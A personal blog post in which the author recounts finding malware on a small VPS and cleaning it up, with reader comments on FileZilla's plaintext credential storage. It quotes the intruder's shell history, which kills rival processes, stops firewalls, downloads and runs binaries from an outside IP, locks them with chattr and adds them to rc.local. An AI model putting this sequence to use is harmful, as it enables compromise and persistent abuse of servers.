My RamNode VPS Got Hacked

I have a 128MB VPS with RamNode which I use only for storage of backup files.

Yesterday, I got a surprising message from RamNode:

“Your VPS has been using a high CPU load for an extended period of time. Please reduce your usage to comply with our AUP and notify us once you’ve done so. We may have to reboot/ shutdown your VPS to keep the node stable.

It looks like your VPS has been compromised. Your VPS had several .fuck and other strange processes running. Please investigate.”

I immediately rushed to the VPS. Peering through FileZilla, I saw that there were at least two strange files called .Rape and .Fuck (the (.) indicates that they are hidden files) in the root folder. There was also a file called fake.config.

A look at the .bash_history file indicated the following entries:


-ef
killall .Rape
chattr -i .Rape
rm -f .Rape
killall .Rapes
chattr -i .Rapes
rm -f .Rapes
ps -ef
killall .TSm
chattr -i .TSm
rm -f .TSm
killall .Mm2
chattr -i .Mm2
rm -f .Mm2
killall dell3
chattr -i dell3
rm -f dell3
killall dell6
chattr -i dell6
rm -f dell6
ps -ef
killall TLB
chattr -i TLB
rm -f TLB
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
sleep 2s
wget http://70.39.124.88:88/.Rape
chmod 0777 .Rape
./.Rape &
chattr +i .Rape
wget http://70.39.124.88:88/.Fuck
chmod 0777 .Fuck
./.Fuck &
chattr +i .Fuck
sleep 2s
echo "cd /root/">>/etc/init.d/rc.local
echo "./.Rape&">>/etc/init.d/rc.local
echo "./.Fuck&">>/etc/init.d/rc.local
echo "/etc/init.d/iptables stop">>/etc/init.d/rc.local
echo "cd /root/">>/etc/rc.local
echo "./.Rape&">>/etc/rc.local
echo "./.Fuck&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

Now what can be seen is that the hacker did a wget from my VPS to http://70.39.124.88:88 and downloaded two files called .Fuck and .Rape. He/She also entered it as a process in the rc.local file. This site is a Chinese site.

What these two files do is not known. I opened them up in notepad but the data was not intelligible. However, these processes were running and you could see them with the command “top”. They were also consuming a lot of CPU as we can see from RamNode’s letter.

The files were write-protected. So a simple delete command


rm .Fuck

threw up the response


rm: cannot remove '.Fuck': Operation not permitted

Now the way to resolve this problem is to run the command


chattr -i .Fuck

The “chattr” command is used to write-protect a file. One can see from the log above that the hacker used the command


chattr +i .Fuck

to protect the file. Using the command


chattr -i .Fuck

removed the protection and I was able to delete the file in the normal manner.

I also deleted reference to .Rape and .Fuck in the rc.local file.

After that I rebooted the VPS but these two processes did not show. The load on the VPS is also zero which suggests that my VPS is clean for now.

I changed the root password and also installed CSF.

The good thing is that the hacker used names like “.Rape”, “.Fuck” and “Fake.Config” which immediately alerted me. If he has used some other Linux names, he could have avoided detection for longer.

3 thoughts on “My RamNode VPS Got Hacked

  • To get an initial idea about the content of the Fuck and Rape files, you should use "file" command in any linux machine.

  • Since the rogue files were in the root folder, it appears that the culprit is filezilla. Filezilla stores the server info and password in a plain text file (xml) at Local Disk (C) > Users> UserName> AppData> Roaming> FileZilla > recentservers.xml.

    If your desktop is infected by a trojan, it can assess the data.

    One should avoid/ minimize the use of ftp. In any event, the 'clear private data' option of filezilla should always be used.

Leave a Reply

Your email address will not be published. Required fields are marked *